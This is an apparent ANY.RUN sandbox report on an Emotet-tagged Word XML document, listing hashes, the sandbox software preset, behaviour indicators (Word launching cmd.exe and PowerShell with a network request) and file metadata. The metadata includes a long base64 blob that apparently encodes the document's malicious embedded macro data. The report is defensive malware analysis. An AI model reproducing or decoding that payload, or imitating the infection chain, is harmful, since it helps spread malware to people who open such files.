Malware analysis FactNum-JBH-90692.doc Malicious activity

analyze malware

Huge database of samples and IOCs
Custom VM setup
Unlimited submissions
Interactive approach

Add for printing

File name:	FactNum-JBH-90692.doc
Full analysis:	https://app.any.run/tasks/cb5c8528-e07f-4808-9d04-252805df80af
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	April 14, 2019, 18:50:54
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	emotet-doc emotet
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:	3674037C5D519E5E6CFE99DFDB87F40E
SHA1:	60C72CEAFE9784D2E6E45DDF7282C93166CD7C74
SHA256:	25B7C267CC3C940D67181681108D3DFEE2CB059C2C70FD2C0C6EF98845518EBF
SSDEEP:	3072:p5Fqffqjbzk/jL/xSu90OoiLuDKZXfwKeljR1z:pjOqjk/xUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (73.0.3683.75)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Request from PowerShell which ran from CMD.EXE
  - powershell.exe (PID: 3004)
- Executes PowerShell scripts
  - cmd.exe (PID: 3088)
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 2608)
- Runs app for hidden code execution
  - cmd.exe (PID: 3064)
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 2608)
SUSPICIOUS
- Starts CMD.EXE for commands execution
  - cmd.exe (PID: 2200)
  - cmd.exe (PID: 3064)
- Creates files in the user directory
  - powershell.exe (PID: 3004)
- Application launched itself
  - cmd.exe (PID: 3064)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 2608)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2608)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (31)
.xml	\|	Generic XML (ASCII) (2.3)
.html	\|	HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch:	360
WordDocumentBodySectSectPrColsSpace:	720
WordDocumentBodySectSectPrPgMarGutter:	-
WordDocumentBodySectSectPrPgMarFooter:	720
WordDocumentBodySectSectPrPgMarHeader:	720
WordDocumentBodySectSectPrPgMarLeft:	1440
WordDocumentBodySectSectPrPgMarBottom:	1440
WordDocumentBodySectSectPrPgMarRight:	1440
WordDocumentBodySectSectPrPgMarTop:	1440
WordDocumentBodySectSectPrPgSzH:	15840
WordDocumentBodySectSectPrPgSzW:	12240
WordDocumentBodySectSectPrRsidR:	005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle:	-
WordDocumentBodySectPRPictShapeImagedataSrc:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle:	width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType:	#_x0000_t75
WordDocumentBodySectPRPictShapeSpid:	_x0000_i1025
WordDocumentBodySectPRPictShapeId:	Picture 1
WordDocumentBodySectPRPictBinData:	(Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio:	t
WordDocumentBodySectPRPictShapetypeLockExt:	edit
WordDocumentBodySectPRPictShapetypePathConnecttype:	rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok:	t
WordDocumentBodySectPRPictShapetypePathExtrusionok:	f
WordDocumentBodySectPRPictShapetypeFormulasFEqn:	if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle:	miter
WordDocumentBodySectPRPictShapetypeStroked:	f
WordDocumentBodySectPRPictShapetypeFilled:	f
WordDocumentBodySectPRPictShapetypePath:	m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative:	t
WordDocumentBodySectPRPictShapetypeSpt:	75
WordDocumentBodySectPRPictShapetypeCoordsize:	21600,21600
WordDocumentBodySectPRPictShapetypeId:	_x0000_t75
WordDocumentBodySectPRRPrNoProof:	-
WordDocumentBodySectPRRsidRPr:	00457E50
WordDocumentBodySectPRsidRDefault:	00C43DF5
WordDocumentBodySectPRsidR:	005E6EE1
WordDocumentDocPrRsidsRsidVal:	005A24B1
WordDocumentDocPrRsidsRsidRootVal:	005E6EE1
WordDocumentDocPrCompatDontGrowAutofit:	-
WordDocumentDocPrCompatUseAsianBreakRules:	-
WordDocumentDocPrCompatWrapTextWithPunct:	-
WordDocumentDocPrCompatSnapToGridInCell:	-
WordDocumentDocPrCompatBreakWrappedTables:	-
WordDocumentDocPrAlwaysShowPlaceholderTextVal:	off
WordDocumentDocPrIgnoreMixedContentVal:	off
WordDocumentDocPrSaveInvalidXMLVal:	off
WordDocumentDocPrValidateAgainstSchema:	-
WordDocumentDocPrPixelsPerInchVal:	120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile:	-
WordDocumentDocPrOptimizeForBrowser:	-
WordDocumentDocPrCharacterSpacingControlVal:	DontCompress
WordDocumentDocPrPunctuationKerning:	-
WordDocumentDocPrDefaultTabStopVal:	720
WordDocumentDocPrDoNotEmbedSystemFonts:	-
WordDocumentDocPrRemovePersonalInformation:	-
WordDocumentDocPrZoomPercent:	100
WordDocumentDocPrViewVal:	print
WordDocumentShapeDefaultsShapelayoutIdmapData:	1
WordDocumentShapeDefaultsShapelayoutIdmapExt:	edit
WordDocumentShapeDefaultsShapelayoutExt:	edit
WordDocumentShapeDefaultsShapedefaultsSpidmax:	1026
WordDocumentShapeDefaultsShapedefaultsExt:	edit
WordDocumentDocSuppDataBinData:	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 